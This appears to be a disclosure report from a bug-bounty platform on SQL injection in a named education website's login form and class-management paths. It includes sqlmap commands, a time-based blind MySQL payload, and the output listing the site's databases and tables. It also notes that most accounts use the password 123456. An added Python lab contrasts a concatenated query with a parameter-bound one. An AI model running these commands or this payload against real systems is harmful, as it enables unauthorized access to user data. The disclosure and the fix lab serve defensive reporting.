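2015-12-04: Details reported to the vendor; awaiting vendor handling
2015-12-05: Vendor confirmed; details disclosed to the vendor only
2015-12-15: Details disclosed to core white hats and relevant domain experts
2015-12-25: Details disclosed to regular white hats
2016-01-04: Details disclosed to intern white hats
2016-01-19: Details disclosed to the public
Site-wide means injection is everywhere
Address: http://tb.koolearn.com/, at the login form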
sqlmap -u "http://tb.koolearn.com/index/lsub?username=a&password=s&checkbox=0"
Parameter: username (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: username=a' AND (SELECT * FROM (SELECT(SLEEP(5)))sMNR) AND 'cOLF'='cOLF&password=s&checkbox=0
---
[23:36:47] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.5.12
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] information_schema
[*] tbl
[*] test
Database: tbl
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| tbl_transaction          | 273227  |
| tbl_remind_push          | 71005   |
| tbl_user_study           | 60076   |
| tbl_course               | 57141   |
| tbl_review               | 26566   |
| tbl_stulist              | 22945   |
| tbl_code                 | 22510   |
| tbl_study                | 14302   |
| tbl_user                 | 14280   |
| zxzbcar_push             | 12867   |
| tbl_message              | 10300   |
| tbl_classlist            | 5154    |
| tbl_user_dream           | 5105    |
| tbl_answers              | 3214    |
| tbl_title                | 3064    |
| tbl_review_unlock        | 1757    |
| tbl_class_resource       | 1750    |
| tbl_bind                 | 1112    |
| tbl_teacher_point        | 985     |
| tbl_finance              | 879     |
| tbl_english_answers      | 877     |
| tbl_english_record       | 810     |
| tbl_finance_wj           | 776     |
| tbl_upaudiofile          | 774     |
| tbl_admin_class          | 554     |
| tbl_efficiency           | 517     |
| tbl_knowledge            | 416     |
| admin_roles              | 410     |
| tbl_english_upaudiofile  | 398     |
| tbl_admin                | 380     |
| tbl_finance_drop         | 371     |
| tbl_english_title        | 272     |
| tbl_messagetext          | 245     |
| tbl_composition          | 209     |
| tbl_coin_log             | 194     |
| tbl_push                 | 142     |
| tbl_knowledge_msg        | 73      |
| tbl_advice               | 65      |
| tbl_menu                 | 65      |
| tbl_morn_read            | 52      |
| tbl_schoollist           | 50      |
| goolen3                  | 48      |
| tbl_english_scene        | 32      |
| tbl_province             | 31      |
| tbl_english_mate         | 29      |
| tbl_buffey_column_video  | 22      |
| tbl_coins                | 21      |
| tbl_buffey_column_review | 13      |
| tbl_english_resource     | 13      |
| tbl_resources            | 9       |
| tbl_buffey_column_name   | 8       |
| tbl_bind_vir             | 4       |
| tbl_roles                | 3       |
| tbl_roles_ctrl           | 3       |
| tbl_advice_reply         | 1       |
| tbl_sign                 | 1       |
| tbl_version              | 1       |
+--------------------------+---------+
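Most passwords are 123456; just log in with any account
[email protected], password 123456
Nice! There are multiple injection points
sqlmap -u "http://tb.koolearn.com/teachmanage/intoclass/classid/3728*/resource_id/33201*/unit_id/166251*" --cookie="<fill in cookie>"
The parameters classid, resource_id and unit_id are all injectable
Filtering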
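Added example (not part of the original report, and not the vendor's code): a Python/sqlite3 lab that runs the `username` payload from the sqlmap output above through a concatenated login query and a parameter-bound one, and accepts the three path IDs only as integers. The `users` table, the function names and the stub `SLEEP()` are assumptions; the real application is PHP on MySQL.

```python
import re
import sqlite3

# Constructed lab data: sqlite3 stands in for the MySQL back end, and the
# table/column names are assumptions (the report does not show the schema).
PAYLOAD = "a' AND (SELECT * FROM (SELECT(SLEEP(5)))sMNR) AND 'cOLF'='cOLF"
ID_ROUTE = re.compile(
    r"/classid/([0-9]{1,10})/resource_id/([0-9]{1,10})"
    r"/unit_id/([0-9]{1,10})\Z")

def make_db():
    """In-memory DB with a stub SLEEP() that records calls instead of delaying."""
    calls = []
    db = sqlite3.connect(":memory:")
    db.create_function("SLEEP", 1, lambda s: calls.append(s) or 0)
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('a', 's')")  # constructed row
    return db, calls

def login_concat(db, username, password):
    """'Before': input is spliced into the SQL text, so a quote changes the query."""
    sql = ("SELECT username FROM users WHERE username='%s' AND password='%s'"
           % (username, password))
    return db.execute(sql).fetchall()

def login_bound(db, username, password):
    """'After': placeholders keep the input as data, never as SQL syntax."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchall()

def parse_ids(path):
    """Accept classid/resource_id/unit_id only when each is purely numeric."""
    m = ID_ROUTE.search(path)
    if m is None:
        raise ValueError("non-numeric id in path")
    return tuple(int(g) for g in m.groups())

def sleep_calls(login):
    """Run one login with the report's payload; return the SLEEP() arguments seen."""
    db, calls = make_db()
    login(db, PAYLOAD, "s")
    return calls

if __name__ == "__main__":
    print("concatenated:", sleep_calls(login_concat))  # injected SLEEP() ran
    print("bound:       ", sleep_calls(login_bound))   # payload stayed a literal
    print(parse_ids("/teachmanage/intoclass/classid/3728/resource_id/33201/unit_id/166251"))
```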
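Severity: High
Vulnerability Rank: 18
Confirmed at: 2015-12-05 00:44
Thank you for reporting the vulnerability; we will handle it as soon as possible!
None yet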